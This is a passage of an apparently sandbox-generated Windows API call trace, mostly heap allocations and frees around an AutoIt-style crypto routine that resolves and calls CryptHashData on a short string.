RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55098 [0232.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0232.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0232.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0232.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0232.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0232.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0232.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0232.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0232.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0232.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0232.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0232.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55018 [0232.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0232.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0232.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0232.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0232.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0232.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0232.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0232.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0232.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0232.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0232.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0232.728] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0232.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0232.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0232.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0232.728] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0232.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0232.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0232.729] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0232.729] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0232.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0232.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e513a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0232.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0232.729] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0232.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0232.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0232.729] CryptHashData (hHash=0xa87250, pbData=0x2e54f18, dwDataLen=0x3, dwFlags=0x1) returned 1 [0232.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0232.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0232.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0232.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0232.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0232.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0232.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0232.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0232.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0232.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0232.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0232.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0232.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0232.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0232.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0232.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0232.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0232.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0232.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0232.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0232.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0232.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0232.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0232.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0232.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0232.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0232.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0232.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0232.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0232.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0232.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0232.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0232.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0232.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0232.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0232.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0232.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0232.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0232.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0232.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0232.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0232.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0232.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0232.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0232.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0232.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0232.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0232.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0232.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0232.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0232.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0232.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0232.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0232.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0232.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0232.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0232.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0232.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0232.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0232.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0232.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0232.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0232.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0232.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0232.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0232.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0232.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0232.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0232.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0232.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0232.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0232.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0232.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0232.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0232.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0232.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0232.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0232.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0232.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0232.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0232.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0232.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0232.732] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0232.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0232.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0232.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0232.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0232.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0232.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0232.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0232.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0232.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0232.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0232.733] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0232.733] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0232.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0232.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0232.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0232.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043f0 [0232.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0232.733] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0232.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043f0 | out: hHeap=0x970000) returned 1 [0232.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0232.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514a8 [0232.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0232.733] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0232.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0232.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0232.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0232.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0232.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0232.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0232.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0232.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0232.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0232.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0232.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0232.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0232.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0232.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0232.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0232.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0232.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0232.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0232.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0232.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0232.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0232.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0232.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0232.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0232.734] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0232.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0232.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0232.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513d0 [0232.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0232.734] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0232.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0232.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0232.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0232.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0232.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0232.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0232.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0232.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0232.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0232.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0232.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0232.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0232.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0232.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0232.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0232.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0232.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0232.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0232.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0232.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0232.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0232.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0232.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0232.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0232.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0232.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0232.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0232.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0232.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0232.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0232.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0232.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0232.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0232.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0232.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0232.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0232.736] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0232.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0232.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0232.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0232.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0232.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0232.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0232.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0232.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0232.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0232.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0232.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0232.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0232.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0232.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0232.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0232.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0232.737] HeapFree (in: 